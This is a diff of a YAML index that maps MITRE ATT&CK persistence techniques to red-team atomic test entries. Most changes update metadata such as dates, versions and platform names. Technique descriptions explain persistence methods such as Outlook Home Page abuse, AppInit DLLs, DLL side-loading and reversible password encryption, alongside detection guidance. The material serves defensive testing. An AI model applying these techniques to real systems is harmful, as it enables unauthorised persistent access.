-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -70508,22 +70886,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests:
     - name: Install Outlook Home Page Persistence
@@ -70561,7 +70966,7 @@ persistence:
           '
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -70622,7 +71027,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -70694,7 +71098,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -70716,7 +71120,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests:
     - name: Add file to Local Library StartupItems
@@ -70949,7 +71352,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -70972,7 +71374,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -71002,12 +71404,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -71097,7 +71497,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests:
     - name: Bitsadmin Download (cmd)
@@ -71227,7 +71626,7 @@ persistence:
         name: command_prompt
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -71312,7 +71711,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests:
     - name: Install AppInit Shim
@@ -71436,7 +71834,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests:
     - name: Set Arbitrary Binary as Screensaver
@@ -71475,13 +71872,13 @@ persistence:
         elevation_required: true
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -71514,10 +71911,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -71554,7 +71950,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -71628,7 +72023,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -71656,7 +72051,6 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests:
     - name: Launch Agent
@@ -71777,7 +72171,7 @@ persistence:
           sudo rm /tmp/T1543_001_atomicredteam.txt
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -71836,33 +72230,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -71883,6 +72254,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -71897,52 +72269,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -71964,6 +72326,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -71974,23 +72337,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -72007,7 +72397,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -72066,7 +72456,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -72148,7 +72537,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -72320,7 +72708,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests:
     - name: Create Systemd Service
@@ -72479,7 +72866,7 @@ persistence:
           systemctl daemon-reload
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -72502,16 +72889,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -72538,7 +72924,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -72607,7 +72992,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -72643,7 +73027,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -72662,7 +73046,6 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests:
     - name: Copy in loginwindow.plist for Re-Opened Applications
@@ -72756,7 +73139,7 @@ persistence:
         name: sh
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -72806,7 +73189,6 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -72925,7 +73307,7 @@ persistence:
         elevation_required: true
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -72958,9 +73340,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -72977,9 +73360,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -73025,7 +73407,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests:
     - name: EXO - Full access mailbox permission granted to a user
@@ -73081,7 +73462,7 @@ persistence:
         elevation_required: false
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -73095,7 +73476,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -73154,7 +73535,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -73180,7 +73560,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -73206,8 +73586,6 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests:
     - name: Logon Scripts
@@ -73237,7 +73615,7 @@ persistence:
         name: command_prompt
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -73261,8 +73639,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -73292,7 +73670,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests:
     - name: Office Application Startup Test Persistence (HKCU)
@@ -73377,7 +73754,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
